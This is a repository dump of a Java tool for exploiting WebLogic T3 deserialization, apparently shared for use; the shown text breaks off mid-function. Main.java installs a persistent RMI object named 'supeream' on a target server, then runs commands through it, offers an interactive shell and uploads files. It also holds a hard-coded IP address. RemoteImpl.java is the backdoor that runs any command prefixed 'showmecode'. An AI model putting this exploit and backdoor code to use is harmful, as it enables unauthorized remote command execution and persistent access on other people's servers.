Repository: 5up3rc/weblogic_cmd
Branch: master
Commit: 2b78744a3c7b
Files: 39
Total size: 55.8 MB
Directory structure:
gitextract_xf0mq9cb/
├── .idea/
│ ├── artifacts/
│ │ └── weblogic_cmd_jar.xml
│ ├── description.html
│ ├── excludeFromValidation.xml
│ ├── libraries/
│ │ ├── commons_cli_1_4.xml
│ │ ├── commons_collections_3_1.xml
│ │ ├── jsafeFIPS.xml
│ │ ├── wlcipher.xml
│ │ └── wlfullclient.xml
│ ├── misc.xml
│ ├── modules.xml
│ ├── project-template.xml
│ └── uiDesigner.xml
├── README.md
├── lib/
│ ├── commons-cli-1.4.jar
│ ├── commons-collections-3.1.jar
│ ├── jsafeFIPS.jar
│ ├── wlcipher.jar
│ └── wlfullclient.jar
├── src/
│ ├── META-INF/
│ │ └── MANIFEST.MF
│ ├── com/
│ │ └── supeream/
│ │ ├── Main.java
│ │ ├── payload/
│ │ │ ├── PayloadTest.java
│ │ │ └── RemoteImpl.java
│ │ ├── serial/
│ │ │ ├── BytesOperation.java
│ │ │ ├── Reflections.java
│ │ │ ├── SerialDataGenerator.java
│ │ │ └── Serializables.java
│ │ ├── ssl/
│ │ │ ├── SocketFactory.java
│ │ │ ├── TrustManagerImpl.java
│ │ │ └── WeblogicTrustManager.java
│ │ └── weblogic/
│ │ ├── BypassPayloadSelector.java
│ │ ├── ObjectTest.java
│ │ ├── T3ProtocolOperation.java
│ │ ├── T3Test.java
│ │ └── WebLogicOperation.java
│ └── weblogic/
│ ├── jms/
│ │ └── common/
│ │ └── StreamMessageImpl.java
│ ├── security/
│ │ └── utils/
│ │ ├── SSLSetup.java
│ │ └── SSLTrustValidator.java
│ └── socket/
│ └── ChannelSSLSocketFactory.java
└── weblogic_cmd.iml
================================================
FILE CONTENTS
================================================
================================================
FILE: .idea/artifacts/weblogic_cmd_jar.xml
================================================
<!-- IntelliJ IDEA artifact definition for weblogic_cmd.jar: the module output and the contents of every library JAR listed below are placed at the archive root ("/"), giving one self-contained JAR. -->
<component name="ArtifactManager">
  <artifact type="jar" name="weblogic_cmd:jar">
    <output-path>$PROJECT_DIR$/out/artifacts/weblogic_cmd_jar</output-path>
    <root id="archive" name="weblogic_cmd.jar">
      <element id="module-output" name="weblogic_cmd" />
      <!-- NOTE(review): commons-collections 3.1 predates the 3.2.2 release, which disabled deserialization of the library's functor classes by default. Dependency scanners will flag this JAR. -->
      <element id="extracted-dir" path="$PROJECT_DIR$/lib/commons-collections-3.1.jar" path-in-jar="/" />
      <element id="extracted-dir" path="$PROJECT_DIR$/lib/wlfullclient.jar" path-in-jar="/" />
      <element id="extracted-dir" path="$PROJECT_DIR$/lib/jsafeFIPS.jar" path-in-jar="/" />
      <!-- NOTE(review): lib/remote.jar is referenced here, but the lib/ directory listing for this repository shows no remote.jar. Confirm whether the artifact still builds without it. -->
      <element id="extracted-dir" path="$PROJECT_DIR$/lib/remote.jar" path-in-jar="/" />
      <element id="extracted-dir" path="$PROJECT_DIR$/lib/wlcipher.jar" path-in-jar="/" />
      <element id="extracted-dir" path="$PROJECT_DIR$/lib/commons-cli-1.4.jar" path-in-jar="/" />
    </root>
  </artifact>
</component>
================================================
FILE: .idea/description.html
================================================
<html>Simple <b>Java</b> application that includes a class with <code>main()</code> method</html>
================================================
FILE: .idea/excludeFromValidation.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ExcludeFromValidation">
<file url="file://$PROJECT_DIR$/src/weblogic/jms/common/StreamMessageImpl.java" />
</component>
</project>
================================================
FILE: .idea/libraries/commons_cli_1_4.xml
================================================
<component name="libraryTable">
<library name="commons-cli-1.4">
<CLASSES>
<root url="jar://$PROJECT_DIR$/lib/commons-cli-1.4.jar!/" />
</CLASSES>
<JAVADOC />
<SOURCES />
</library>
</component>
================================================
FILE: .idea/libraries/commons_collections_3_1.xml
================================================
<component name="libraryTable">
<library name="commons-collections-3.1">
<CLASSES>
<root url="jar://$PROJECT_DIR$/lib/commons-collections-3.1.jar!/" />
</CLASSES>
<JAVADOC />
<SOURCES />
</library>
</component>
================================================
FILE: .idea/libraries/jsafeFIPS.xml
================================================
<component name="libraryTable">
<library name="jsafeFIPS">
<CLASSES>
<root url="jar://$PROJECT_DIR$/lib/jsafeFIPS.jar!/" />
</CLASSES>
<JAVADOC />
<SOURCES />
</library>
</component>
================================================
FILE: .idea/libraries/wlcipher.xml
================================================
<component name="libraryTable">
<library name="wlcipher">
<CLASSES>
<root url="jar://$PROJECT_DIR$/lib/wlcipher.jar!/" />
</CLASSES>
<JAVADOC />
<SOURCES />
</library>
</component>
================================================
FILE: .idea/libraries/wlfullclient.xml
================================================
<component name="libraryTable">
<library name="wlfullclient">
<CLASSES>
<root url="jar://$PROJECT_DIR$/lib/wlfullclient.jar!/" />
</CLASSES>
<JAVADOC />
<SOURCES>
<root url="jar://$PROJECT_DIR$/lib/wlfullclient.jar!/" />
</SOURCES>
</library>
</component>
================================================
FILE: .idea/misc.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<!-- IntelliJ IDEA project settings. The language level (JDK_1_6) and project JDK name (1.6) pin the sources to Java 6 syntax and APIs; build output goes to $PROJECT_DIR$/out. -->
<project version="4">
  <!-- Presumably an IDE-generated project identifier; it is not read by the Java sources in this repository. -->
  <component name="ProjectKey">
    <option name="state" value="project://e2804f05-5315-4fc6-a121-c522a6c26470" />
  </component>
  <component name="ProjectRootManager" version="2" languageLevel="JDK_1_6" default="false" project-jdk-name="1.6" project-jdk-type="JavaSDK">
    <output url="file://$PROJECT_DIR$/out" />
  </component>
</project>
================================================
FILE: .idea/modules.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectModuleManager">
<modules>
<module fileurl="file://$PROJECT_DIR$/weblogic_cmd.iml" filepath="$PROJECT_DIR$/weblogic_cmd.iml" />
</modules>
</component>
</project>
================================================
FILE: .idea/project-template.xml
================================================
<template>
<input-field default="com.company">IJ_BASE_PACKAGE</input-field>
</template>
================================================
FILE: .idea/uiDesigner.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="Palette2">
<group name="Swing">
<item class="com.intellij.uiDesigner.HSpacer" tooltip-text="Horizontal Spacer" icon="/com/intellij/uiDesigner/icons/hspacer.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="1" hsize-policy="6" anchor="0" fill="1" />
</item>
<item class="com.intellij.uiDesigner.VSpacer" tooltip-text="Vertical Spacer" icon="/com/intellij/uiDesigner/icons/vspacer.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="1" anchor="0" fill="2" />
</item>
<item class="javax.swing.JPanel" icon="/com/intellij/uiDesigner/icons/panel.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3" />
</item>
<item class="javax.swing.JScrollPane" icon="/com/intellij/uiDesigner/icons/scrollPane.png" removable="false" auto-create-binding="false" can-attach-label="true">
<default-constraints vsize-policy="7" hsize-policy="7" anchor="0" fill="3" />
</item>
<item class="javax.swing.JButton" icon="/com/intellij/uiDesigner/icons/button.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="3" anchor="0" fill="1" />
<initial-values>
<property name="text" value="Button" />
</initial-values>
</item>
<item class="javax.swing.JRadioButton" icon="/com/intellij/uiDesigner/icons/radioButton.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="3" anchor="8" fill="0" />
<initial-values>
<property name="text" value="RadioButton" />
</initial-values>
</item>
<item class="javax.swing.JCheckBox" icon="/com/intellij/uiDesigner/icons/checkBox.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="3" anchor="8" fill="0" />
<initial-values>
<property name="text" value="CheckBox" />
</initial-values>
</item>
<item class="javax.swing.JLabel" icon="/com/intellij/uiDesigner/icons/label.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="0" anchor="8" fill="0" />
<initial-values>
<property name="text" value="Label" />
</initial-values>
</item>
<item class="javax.swing.JTextField" icon="/com/intellij/uiDesigner/icons/textField.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
<preferred-size width="150" height="-1" />
</default-constraints>
</item>
<item class="javax.swing.JPasswordField" icon="/com/intellij/uiDesigner/icons/passwordField.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
<preferred-size width="150" height="-1" />
</default-constraints>
</item>
<item class="javax.swing.JFormattedTextField" icon="/com/intellij/uiDesigner/icons/formattedTextField.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
<preferred-size width="150" height="-1" />
</default-constraints>
</item>
<item class="javax.swing.JTextArea" icon="/com/intellij/uiDesigner/icons/textArea.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JTextPane" icon="/com/intellij/uiDesigner/icons/textPane.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JEditorPane" icon="/com/intellij/uiDesigner/icons/editorPane.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JComboBox" icon="/com/intellij/uiDesigner/icons/comboBox.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="2" anchor="8" fill="1" />
</item>
<item class="javax.swing.JTable" icon="/com/intellij/uiDesigner/icons/table.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JList" icon="/com/intellij/uiDesigner/icons/list.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="2" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JTree" icon="/com/intellij/uiDesigner/icons/tree.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JTabbedPane" icon="/com/intellij/uiDesigner/icons/tabbedPane.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3">
<preferred-size width="200" height="200" />
</default-constraints>
</item>
<item class="javax.swing.JSplitPane" icon="/com/intellij/uiDesigner/icons/splitPane.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3">
<preferred-size width="200" height="200" />
</default-constraints>
</item>
<item class="javax.swing.JSpinner" icon="/com/intellij/uiDesigner/icons/spinner.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1" />
</item>
<item class="javax.swing.JSlider" icon="/com/intellij/uiDesigner/icons/slider.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1" />
</item>
<item class="javax.swing.JSeparator" icon="/com/intellij/uiDesigner/icons/separator.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3" />
</item>
<item class="javax.swing.JProgressBar" icon="/com/intellij/uiDesigner/icons/progressbar.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="0" fill="1" />
</item>
<item class="javax.swing.JToolBar" icon="/com/intellij/uiDesigner/icons/toolbar.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="0" fill="1">
<preferred-size width="-1" height="20" />
</default-constraints>
</item>
<item class="javax.swing.JToolBar$Separator" icon="/com/intellij/uiDesigner/icons/toolbarSeparator.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="0" anchor="0" fill="1" />
</item>
<item class="javax.swing.JScrollBar" icon="/com/intellij/uiDesigner/icons/scrollbar.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="0" anchor="0" fill="2" />
</item>
</group>
</component>
</project>
================================================
FILE: README.md
================================================
# weblogic_cmd
weblogic t3 deserialization rce
1. 直接通过加载字节码的方式来加载class,执行无文件生成。通过绑定rmi来实现回显。
2. 支持t3s
3. 支持StreamMessageImpl,MarshalledObject绕过
使用说明:
-H 远程目标主机
-P 远程目标端口
-C 需要执行的命令
-T 可选的绕过方式
-U 删除绑定的rmi实例
-B 通过payload直接调用系统命令-针对没法回显的情况下使用
-os 指定目标操作系统
-https 使用tls的指定
-shell 以shell的方式展现
-upload 上传文件 需要配合-src -dst
-src 需要上传的文件路径
-dst 需要上传文件至目标的路径
-noExecPath 在某些没有/bin/bash 或者cmd.exe情况下使用
================================================
FILE: lib/wlfullclient.jar
================================================
[File too large to display: 55.6 MB]
================================================
FILE: src/META-INF/MANIFEST.MF
================================================
Manifest-Version: 1.0
Main-Class: com.supeream.Main
================================================
FILE: src/com/supeream/Main.java
================================================
package com.supeream;
import com.supeream.serial.BytesOperation;
import com.supeream.ssl.WeblogicTrustManager;
import com.supeream.weblogic.WebLogicOperation;
import org.apache.commons.cli.*;
import weblogic.cluster.singleton.ClusterMasterRemote;
import weblogic.jndi.Environment;
import weblogic.utils.encoders.BASE64Encoder;
import javax.naming.Context;
import javax.naming.NamingException;
import java.io.FileNotFoundException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.Scanner;
/**
 * Command-line driver of the tool.
 *
 * <p>It parses the options, then delegates to {@link WebLogicOperation} for the
 * network operations (install/uninstall of the remote object, blind execution,
 * file upload) and talks to the installed remote object through JNDI.
 *
 * <p>Fixed strings in this class that are useful when reviewing server-side
 * evidence: the JNDI binding name {@code "supeream"}, the request prefix
 * {@code "showmecode"} (optionally followed by {@code "$NO$"}) passed to
 * {@code ClusterMasterRemote.getServerLocation}, and provider URLs of the form
 * {@code t3://host:port} or {@code t3s://host:port}.
 */
public class Main {
    /** WebLogic JNDI initial-context factory class name. Not referenced elsewhere in this class. */
    public static final String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
    /** Selected payload wrapper type; defaults to "streamMessageImpl" and is overwritten by -T in main(). */
    public static String TYPE = "streamMessageImpl";
    /** Names shown in the -T help text. NOTE(review): main() does not check the -T value against this list. */
    public static List<String> types = Arrays.asList(new String[]{"marshall", "collection", "streamMessageImpl"});
    /** Never assigned in this class. */
    public static String version;
    /** Parsed command line; set in main() and read by the static helpers below. */
    public static CommandLine cmdLine;
    /** Command string sent to the remote object; "whoami" unless -C or the interactive prompt replaces it. */
    private static String cmd = "whoami";

    /**
     * Builds a WebLogic JNDI context for the given provider URL.
     *
     * <p>Server affinity is switched off and a {@link WeblogicTrustManager} is installed as the
     * SSL client trust manager.
     * NOTE(review): WeblogicTrustManager is defined outside this class; presumably it accepts
     * any server certificate — confirm in that class.
     *
     * @param url provider URL, as produced by {@link #converUrl(String, String)}
     * @return the initial context obtained from the WebLogic {@code Environment}
     */
    public static Context getInitialContext(String url) throws NamingException, FileNotFoundException {
        Environment environment = new Environment();
        environment.setProviderUrl(url);
        environment.setEnableServerAffinity(false);
        environment.setSSLClientTrustManager(new WeblogicTrustManager());
        return environment.getInitialContext();
    }

    /**
     * Looks up the JNDI name "supeream" on the target and, when it resolves, runs
     * {@link #invokeRmi(ClusterMasterRemote)} against it.
     *
     * @return true when the lookup succeeded and invokeRmi returned; false when any exception
     *         was thrown (a message containing "supeream" is reported as "not installed",
     *         anything else prints the stack trace)
     */
    public static boolean checkIsAlreadyInstalled(String host, String port) {
        try {
            System.out.println("检查是否安装rmi实例");
            Context initialContext = getInitialContext(converUrl(host, port));
            ClusterMasterRemote remoteCode = (ClusterMasterRemote) initialContext.lookup("supeream");
            System.out.println("rmi已经安装");
            invokeRmi(remoteCode);
            return true;
        } catch (Exception e) {
            // The lookup failure is recognised only by the binding name appearing in the message text.
            if (e.getMessage() !=null && e.getMessage().contains("supeream")) {
                System.out.println("rmi实例不存在");
            } else {
                e.printStackTrace();
                // System.exit(0);
            }
        }
        return false;
    }

    /**
     * Runs the "blind" path when both -B and -C are present: hands the -C value to
     * {@code WebLogicOperation.blindExecute} and terminates the JVM. Does nothing otherwise.
     */
    public static void executeBlind(String host, String port) throws Exception {
        if (cmdLine.hasOption("B") && cmdLine.hasOption("C")) {
            System.out.println("执行命令:" + cmdLine.getOptionValue("C"));
            WebLogicOperation.blindExecute(host, port, cmdLine.getOptionValue("C"));
            System.out.println("执行blind命令完成");
            System.exit(0);
        }
    }

    /**
     * Formats the provider URL: scheme "t3s" when -https was given, otherwise "t3".
     * Host and port are concatenated as supplied, without validation.
     */
    public static String converUrl(String host, String port) {
        if (cmdLine.hasOption("https")) {
            return "t3s://" + host + ":" + port;
        } else {
            return "t3://" + host + ":" + port;
        }
    }

    /**
     * Concatenates the remembered "cd ..." commands, appending "&&" after each one
     * (so a non-empty result always ends with "&&").
     */
    private static String cdConcat(List<String> cds) {
        StringBuffer stringBuffer = new StringBuffer();
        for (String cd: cds) {
            stringBuffer.append(cd);
            stringBuffer.append("&&");
        }
        return stringBuffer.toString();
    }

    /**
     * Sends command strings to the remote object and prints what it returns.
     *
     * <p>With -shell the method loops forever reading lines from standard input; "exit" ends the
     * JVM, "clear" and "back" edit the list of remembered "cd" commands, and every other line is
     * sent prefixed by the remembered "cd" commands. Without -shell the current {@code cmd} value
     * is sent once. In both modes the request is the literal "showmecode" (plus "$NO$" when
     * -noExecPath is set) followed by the command text.
     *
     * @param remoteCode remote object obtained from the JNDI lookup
     */
    public static void invokeRmi(ClusterMasterRemote remoteCode) throws Exception {
        String result = null;
        if (Main.cmdLine.hasOption("shell")) {
            Scanner scanner = new Scanner(System.in);
            // "cd" commands are replayed before every request, so each request starts from the same directory chain.
            List<String> cacheCmds = new ArrayList<String>();
            while (true) {
                System.out.print("please input cmd:>");
                cmd = scanner.nextLine();
                if (cmd.equalsIgnoreCase("exit")) {
                    System.exit(0);
                }
                if (cmd.startsWith("cd ")) {
                    cacheCmds.add(cmd);
                }
                if (cmd.equalsIgnoreCase("clear")) {
                    cacheCmds.clear();
                    continue;
                }
                if (cmd.equalsIgnoreCase("back")) {
                    cacheCmds.remove(cacheCmds.size()-1);
                    continue;
                }
                String newCmd = cdConcat(cacheCmds);
                if (!cmd.startsWith("cd ")) {
                    newCmd += cmd;
                } else if (newCmd.length()>3){
                    // The line was itself a "cd": drop the trailing "&&" that cdConcat appended.
                    newCmd = newCmd.substring(0, newCmd.length()-2);
                }
                if (Main.cmdLine.hasOption("noExecPath")) {
                    result = remoteCode.getServerLocation("showmecode$NO$"+newCmd);
                } else {
                    result = remoteCode.getServerLocation("showmecode"+newCmd);
                }
                System.out.println(result);
            }
        } else {
            System.out.println("执行命令:" + cmd);
            if (Main.cmdLine.hasOption("noExecPath")) {
                result = remoteCode.getServerLocation("showmecode$NO$"+cmd);
            } else {
                result = remoteCode.getServerLocation("showmecode"+cmd);
            }
            System.out.println(result);
        }
    }

    /**
     * Program entry point: sets the WebLogic client security properties, parses the options and
     * dispatches to uninstall (-U), blind execution (-B with -C), upload (-upload with -src and
     * -dst) or the install-then-invoke path.
     */
    public static void main(String[] args) {
        // Client-side TLS settings, named after the properties they set: the two CryptoJ
        // properties relax its default JCE and PRNG checks, hostname verification is switched
        // off, and the WebLogic demo trust keystore is selected.
        System.setProperty("weblogic.security.allowCryptoJDefaultJCEVerification", "true");
        System.setProperty("weblogic.security.allowCryptoJDefaultPRNG", "true");
        System.setProperty("weblogic.security.SSL.ignoreHostnameVerification", "true");
        System.setProperty("weblogic.security.TrustKeyStore", "DemoTrust");
        Options options = new Options();
        options.addOption("H", true, "Remote Host[need set]");
        options.addOption("P", true, "Remote Port[need set]");
        options.addOption("C", true, "Execute Command[need set]");
        options.addOption("T", true, "Payload Type" + types);
        options.addOption("U", false, "Uninstall rmi");
        options.addOption("B", false, "Runtime Blind Execute Command maybe you should select os type");
        options.addOption("os", true, "Os Type [windows,linux]");
        options.addOption("https", false, "enable https or tls");
        options.addOption("shell", false, "enable shell module");
        options.addOption("upload", false, "enable upload a file");
        options.addOption("src", true, "path to src file ");
        options.addOption("dst", true, "path to dst file ");
        options.addOption("noExecPath", false, "custom execute path");
        try {
            // NOTE(review): this hard-coded address is never used. When -H is absent the program
            // prints the help text and exits, so the literal is dead and should be removed from the source.
            String host = "202.60.207.169";
            String port = "7001";
            CommandLineParser parser = new DefaultParser();
            cmdLine = parser.parse(options, args);
            if (cmdLine.hasOption("H")) {
                host = cmdLine.getOptionValue("H");
            } else {
                HelpFormatter formatter = new HelpFormatter();
                formatter.printHelp("supeream", options);
                System.exit(0);
            }
            if (cmdLine.hasOption("P")) {
                port = cmdLine.getOptionValue("P");
            }
            if (cmdLine.hasOption("C")) {
                cmd = cmdLine.getOptionValue("C");
            }
            if (cmdLine.hasOption("T")) {
                TYPE = cmdLine.getOptionValue("T");
            }
            if (cmdLine.hasOption("U")) {
                System.out.println("开始删除rmi实例");
                WebLogicOperation.unInstallRmi(host, port);
                System.out.println("后门删除实例");
                System.exit(0);
            }
            // Exits the JVM itself when -B and -C are both present.
            executeBlind(host, port);
            if (Main.cmdLine.hasOption("upload") && Main.cmdLine.hasOption("src") && Main.cmdLine.hasOption("dst")) {
                System.out.println("开始上传文件");
                String path = Main.cmdLine.getOptionValue("src");
                byte[] fileContent = BytesOperation.GetByteByFile(path);
                WebLogicOperation.uploadFile(host, port, Main.cmdLine.getOptionValue("dst"), fileContent);
                System.out.println("file upload success");
                System.exit(0);
            }
            // An existing "supeream" binding is reused; the install below runs only when the lookup fails.
            if (checkIsAlreadyInstalled(host, port)) {
                System.exit(0);
            }
            System.out.println("开始安装rmi实例");
            WebLogicOperation.installRmi(host, port);
            System.out.println("等待rmi实例安装成功 ");
            // Fixed two-second wait before the lookup; there is no retry.
            Thread.sleep(2000);
            Context initialContext = getInitialContext(converUrl(host, port));
            ClusterMasterRemote remoteCode = (ClusterMasterRemote) initialContext.lookup("supeream");
            invokeRmi(remoteCode);
        } catch (Exception e) {
            // Every failure, including option-parsing errors, is reported through this one handler.
            System.out.println("实例安装失败");
            String msg = e.getMessage();
            if (msg != null && msg.contains("Unrecognized option")) {
                HelpFormatter formatter = new HelpFormatter();
                formatter.printHelp("supeream", options);
            } else {
                System.out.println("实例rmi安装失败 请切换-OB模式");
                e.printStackTrace();
            }
        }
    }
}
================================================
FILE: src/com/supeream/payload/PayloadTest.java
================================================
package com.supeream.payload;
import com.supeream.serial.BytesOperation;
import sun.org.mozilla.javascript.internal.DefiningClassLoader;
/**
 * Created by nike on 17/7/3.
 *
 * <p>Developer scratch program: reads the compiled RemoteImpl class file from a hard-coded
 * local build directory, prints it as a hex string and defines the class through a
 * {@code DefiningClassLoader}.
 * NOTE(review): the printed hex presumably feeds the {@code remoteHex} constant in
 * SerialDataGenerator — confirm. The absolute paths only exist on the author's machine.
 */
public class PayloadTest {
    /** Prints the hex form of RemoteImpl.class and the Class object defined from it. */
    public static void main(String[] args) throws Exception {
//        byte[] iRemoteCode = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/supeream/payload/IRemote.class");
//        System.out.println(BytesOperation.bytesToHexString(iRemoteCode));
        // DefiningClassLoader comes from a JDK-internal package (sun.org.mozilla.javascript.internal), so this only compiles on JDKs that ship it.
        DefiningClassLoader definingClassLoader = new DefiningClassLoader();
//        Class<?> cls = definingClassLoader.defineClass("com.supeream.payload.IRemote",iRemoteCode);
        byte[] remoteCodeImpl = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/supeream/payload/RemoteImpl.class");
        System.out.println(BytesOperation.bytesToHexString(remoteCodeImpl));
        Class<?> cls_ = definingClassLoader.defineClass("com.supeream.payload.RemoteImpl", remoteCodeImpl);
        // Resolved through the caller's class loader, not through definingClassLoader.
        Class.forName("com.supeream.payload.RemoteImpl");
        System.out.println(cls_);
    }
}
================================================
FILE: src/com/supeream/payload/RemoteImpl.java
================================================
package com.supeream.payload;
import sun.tools.asm.TryData;
import weblogic.cluster.singleton.ClusterMasterRemote;
import weblogic.utils.encoders.BASE64Decoder;
import javax.naming.Context;
import javax.naming.InitialContext;
import java.io.BufferedReader;
import java.io.FileOutputStream;
import java.io.InputStreamReader;
import java.rmi.RemoteException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
/**
 * Created by nike on 17/6/27.
 *
 * <p>Implementation of WebLogic's {@code ClusterMasterRemote} interface whose
 * {@link #getServerLocation(String)} runs an operating-system command and returns its output.
 *
 * <p>Observable artefacts, all fixed in this source: the JNDI binding name {@code "supeream"},
 * the request prefix {@code "showmecode"}, the reply {@code "guess me?"} for requests without
 * that prefix, and child processes started as {@code /bin/bash -c ...} or {@code cmd.exe /c ...}
 * by whichever JVM hosts this class. A JNDI tree entry with that name, or a shell spawned by
 * the application-server process, are the corresponding detection points.
 */
public class RemoteImpl implements ClusterMasterRemote {
    /**
     * Dispatches on the arguments: {@code blind <request>} calls getServerLocation once;
     * {@code install} rebinds this object under "supeream" in the default InitialContext;
     * {@code uninstall} unbinds that name. Any other argument shape does nothing.
     * All exceptions are swallowed, so failures leave no trace on the caller's side.
     */
    public static void main(String[] args) {
        try {
            RemoteImpl remote = new RemoteImpl();
            if (args.length == 2 && args[0].equalsIgnoreCase("blind")) {
                remote.getServerLocation(args[1]);
            } else if (args.length == 1) {
                Context ctx = new InitialContext();
                if (args[0].equalsIgnoreCase("install")) {
                    ctx.rebind("supeream", remote);
                } else if (args[0].equalsIgnoreCase("uninstall")) {
                    ctx.unbind("supeream");
                }
            }
        } catch (Exception e) {
        }
    }

    /** Interface method required by ClusterMasterRemote; intentionally empty. */
    @Override
    public void setServerLocation(String cmd, String args) throws RemoteException {
    }

    /**
     * Writes {@code content} to {@code path}, replacing any existing file.
     * Exceptions are swallowed; if the write throws, the stream is left unclosed.
     *
     * @param path    destination path, used exactly as given
     * @param content bytes to write
     */
    public static void uploadFile(String path, byte[] content) {
        try {
            FileOutputStream fileOutputStream = new FileOutputStream(path);
            fileOutputStream.write(content);
            fileOutputStream.flush();
            fileOutputStream.close();
        }catch (Exception e) {
        }
    }

    /**
     * Treats the argument as a command request rather than a server-location query.
     *
     * @param cmd request string; must start with "showmecode", which is stripped. A following
     *            "$NO$" marker means the remainder is used as the single element of the process
     *            argument list (no shell wrapper).
     * @return "guess me?" when the prefix is missing; otherwise the combined standard output and
     *         standard error of the process, one "\n" after each line; or the exception message
     *         when anything fails
     */
    @Override
    public String getServerLocation(String cmd) throws RemoteException {
        try {
            if (!cmd.startsWith("showmecode")) {
                return "guess me?";
            } else {
                // 10 is the length of the "showmecode" prefix.
                cmd = cmd.substring(10);
            }
            // Any os.name containing "win" selects cmd.exe; everything else is treated as Linux.
            boolean isLinux = true;
            String osTyp = System.getProperty("os.name");
            if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                isLinux = false;
            }
            List<String> cmds = new ArrayList<String>();
            if (cmd.startsWith("$NO$")) {
                cmds.add(cmd.substring(4));
            }else if (isLinux) {
                cmds.add("/bin/bash");
                cmds.add("-c");
                cmds.add(cmd);
            } else {
                cmds.add("cmd.exe");
                cmds.add("/c");
                cmds.add(cmd);
            }
            ProcessBuilder processBuilder = new ProcessBuilder(cmds);
            // stderr is merged into stdout so a single reader sees all output.
            processBuilder.redirectErrorStream(true);
            Process proc = processBuilder.start();
            // The reader uses the platform default charset and is never closed.
            BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
            StringBuffer sb = new StringBuffer();
            String line;
            while ((line = br.readLine()) != null) {
                sb.append(line).append("\n");
            }
            return sb.toString();
        } catch (Exception e) {
            return e.getMessage();
        }
    }
}
================================================
FILE: src/com/supeream/serial/BytesOperation.java
================================================
package com.supeream.serial;
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
import java.io.FileInputStream;
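/**
 * Byte-array helpers: hex encoding and decoding, concatenation and whole-file reads.
 */
public class BytesOperation {
    /** Upper-case hex alphabet; the index of a character is its nibble value. */
    private static final String HEX_DIGITS = "0123456789ABCDEF";

    /**
     * Decodes a hexadecimal string (either letter case) into bytes.
     *
     * @param hexString hex text with two characters per byte
     * @return the decoded bytes, or {@code null} when {@code hexString} is null or empty
     * @throws IllegalArgumentException when the length is odd or a character is not a hex digit;
     *         such input used to be decoded silently into wrong bytes
     */
    public static byte[] hexStringToBytes(String hexString) {
        if (hexString == null || hexString.equals("")) {
            return null;
        }
        if (hexString.length() % 2 != 0) {
            throw new IllegalArgumentException("hex string must contain an even number of characters");
        }
        // Locale.ROOT keeps the upper-casing independent of the default locale.
        char[] hexChars = hexString.toUpperCase(java.util.Locale.ROOT).toCharArray();
        byte[] decoded = new byte[hexChars.length / 2];
        for (int i = 0; i < decoded.length; ++i) {
            int high = charToByte(hexChars[2 * i]);
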